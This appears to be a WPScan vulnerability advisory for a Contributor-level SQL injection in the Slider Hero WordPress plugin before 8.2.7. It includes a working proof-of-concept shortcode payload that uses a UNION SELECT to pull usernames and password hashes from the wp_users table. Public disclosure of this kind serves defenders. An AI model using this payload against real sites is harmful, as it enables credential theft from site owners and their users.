WordPress Plugin Vulnerabilities
Slider Hero < 8.2.7 - Contributor+ SQL Injection
Description
The plugin does not sanitise or escape the id attribute of its hero-button shortcode before using it in a SQL statement, allowing users with a role as low as Contributor to perform SQL injection.
Proof of Concept
As a contributor, add the following shortcode in a post and preview it to execute the SQLi
[hero-button id='1 UNION SELECT 2,"",2,1,NULL,"",NULL,0,NULL,"{}",999,NULL,CONCAT(CONCAT(CONCAT(CONCAT(FROM_BASE64("eyJidXR0b25fdGV4dCI6Ig=="),user_login),":"),user_pass),FROM_BASE64("IiwiYnV0dG9uX3VybCI6IiMiLCJidXR0b25fdGFyZ2V0IjoiX2JsYW5rIiwiYnV0dG9uX2JvcmRlciI6InNxdWFyZSIsImJ1dHRvbl9zdHlsZSI6ImZ1bGxfYmFja2dyb3VuZCIsImJ1dHRvbl9lZmZlY3QiOiJleGJvcmRlciIsImJ1dHRvbl9mb250X3dlaWdodCI6Im5vcm1hbCIsImJ1dHRvbl9mb250X3NpemUiOiIiLCJidXR0b25fbGV0dGVyX3NwYWNpbmciOiIiLCJidXR0b25fY29sb3IiOiIjMDAwMDAwIiwiYnV0dG9uX2hvdmVyX2NvbG9yIjoiIiwiYnV0dG9uX2JhY2tncm91bmRfY29sb3IiOiIjZmZmZmZmIiwiaGVyb19idXR0b25fc2hvcnRjb2RlIjoiMSIsImhlcm9fYnV0dG9uX3Nob3J0Y29kZV92YWx1ZSI6IiIsImJ1dHRvbl9iYWNrZ3JvdW5kX2hvdmVyX2NvbG9yIjoiIn0=")),FROM_BASE64("eyJidXR0b25fdGV4dCI6IkRvd25sb2FkIE5vdyIsImJ1dHRvbl91cmwiOiIjIiwiYnV0dG9uX3RhcmdldCI6Il9ibGFuayIsImJ1dHRvbl9ib3JkZXIiOiJzcXVhcmUiLCJidXR0b25fc3R5bGUiOiJmdWxsX2JhY2tncm91bmQiLCJidXR0b25fZWZmZWN0IjoiZXhib3JkZXIiLCJidXR0b25fZm9udF93ZWlnaHQiOiJub3JtYWwiLCJidXR0b25fZm9udF9zaXplIjoiIiwiYnV0dG9uX2xldHRlcl9zcGFjaW5nIjoiIiwiYnV0dG9uX2NvbG9yIjoiIzAwMDAwMCIsImJ1dHRvbl9ob3Zlcl9jb2xvciI6IiIsImJ1dHRvbl9iYWNrZ3JvdW5kX2NvbG9yIjoiI2ZmZmZmZiIsImhlcm9fYnV0dG9uX3Nob3J0Y29kZSI6IiIsImhlcm9fYnV0dG9uX3Nob3J0Y29kZV92YWx1ZSI6IiIsImJ1dHRvbl9iYWNrZ3JvdW5kX2hvdmVyX2NvbG9yIjoiIn0="),"",NULL,NULL,NULL,NULL,NULL FROM wp_users']
Affects Plugins
Fixed in 8.2.7 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-26 (about 2 years ago)
Added
2021-07-26 (about 2 years ago)
Last Updated
2022-02-24 (about 2 years ago)
WPScan 